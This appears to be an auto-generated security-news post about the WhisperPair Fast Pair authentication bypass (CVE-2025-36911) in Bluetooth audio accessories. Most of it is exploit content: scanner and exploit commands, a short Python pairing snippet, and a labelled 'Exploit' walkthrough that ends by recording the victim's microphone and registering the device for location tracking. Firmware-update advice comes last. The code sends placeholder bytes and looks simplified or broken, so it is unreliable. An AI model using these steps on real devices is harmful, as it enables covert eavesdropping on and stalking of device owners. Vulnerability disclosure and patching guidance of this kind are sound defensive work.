Listen to this Post
The WhisperPair vulnerability (CVE-2025-36911) is a critical authentication bypass in the accessory-side implementation of Google’s Fast Pair protocol, affecting hundreds of millions of Bluetooth audio devices from manufacturers including Google, Jabra, JBL, Logitech, Marshall, Nothing, OnePlus, Sony, Soundcore, and Xiaomi. The flaw originates from a logic error in key-based pairing where devices accept pairing requests even when not in pairing mode. Per the Fast Pair specification, accessories should ignore pairing requests unless explicitly in pairing mode, but many vendors failed to enforce this check, allowing unauthorized devices to initiate pairing without user consent or knowledge. An attacker sends a Fast Pair message to a vulnerable accessory indicating intent to pair; the device improperly responds, enabling the attacker to complete a standard Bluetooth pairing within approximately 10 seconds from up to 14 meters away. Once paired, the attacker gains complete control over the audio device, enabling eavesdropping through the device’s microphone and tracking the victim’s location via Google’s Find Hub network. The vulnerability affects users regardless of smartphone operating system because the flaw lies in the accessories themselves, meaning iPhone users with vulnerable Bluetooth devices are equally at risk. Google awarded researchers $15,000 and worked with manufacturers on security patches during a 150-day disclosure window, but updates may not yet be available for all vulnerable devices.
DailyCVE Form:
Platform: Bluetooth Fast Pair
Version: All versions
Vulnerability : Auth Bypass
Severity: Critical
date: 2026-01-15
Prediction: 2026-06-15
What Undercode Say:
Clone the WPair scanner tool for testing git clone https://github.com/whisperpair/wpairs.git cd wpairs Install required Bluetooth dependencies sudo apt update sudo apt install -y bluez libbluetooth-dev python3-pip Install Python requirements pip3 install -r requirements.txt Run the scanner to detect vulnerable devices sudo python3 wpair_scanner.py --scan --range 14 Demonstrate the Fast Pair pairing exploit sudo python3 wpair_exploit.py --target XX:XX:XX:XX:XX:XX --pair
Simplified Fast Pair pairing request logic
import bluetooth
target_address = "XX:XX:XX:XX:XX:XX"
Send Fast Pair pairing request to vulnerable accessory
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((target_address, 1))
sock.send(b"\x00\x01\x02") Fast Pair pairing initiation
response = sock.recv(1024)
If accessory responds while not in pairing mode, vulnerability exists
if response:
print("[+] Device vulnerable to WhisperPair")
Complete regular Bluetooth pairing
sock.close()
Exploit: (Educational Purposes!)
Step 1: Scan for nearby Bluetooth Fast Pair devices sudo hcitool scan Step 2: Use WPair to test if device accepts pairing when not in pairing mode sudo python3 wpair_test.py --mac XX:XX:XX:XX:XX:XX Step 3: Initiate unauthorized pairing sudo python3 wpair_pair.py --mac XX:XX:XX:XX:XX:XX Step 4: Access device microphone after successful pairing sudo arecord -D bluetooth -f cd -d 30 eavesdrop.wav Step 5: Add device to Google Find Hub for location tracking python3 find_hub_tracker.py --device XX:XX:XX:XX:XX:XX --account [email protected]
Protection: from this CVE
Check current firmware version of Bluetooth audio device (varies by manufacturer - example for Jabra) sudo jabra-firmware-check --device XX:XX:XX:XX:XX:XX Update firmware via manufacturer companion app Google Pixel Buds: Settings > Bluetooth > Pixel Buds > Firmware update Sony: Sony Headphones Connect app JBL: JBL Headphones app Jabra: Jabra Sound+ app Verify patch status using WPair scanner sudo python3 wpair_scanner.py --check-patch --mac XX:XX:XX:XX:XX:XX Disable Bluetooth when not in use (temporary mitigation) sudo rfkill block bluetooth Re-enable Bluetooth sudo rfkill unblock bluetooth
Impact: Complete compromise of Bluetooth audio accessories including unauthorized microphone access for eavesdropping, location tracking via Google Find Hub, audio hijacking, and potential lateral movement to paired smartphones through extracted link keys. Hundreds of millions of devices affected across major manufacturers including Google, Jabra, JBL, Sony, Marshall, Logitech, Nothing, OnePlus, Soundcore, and Xiaomi.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

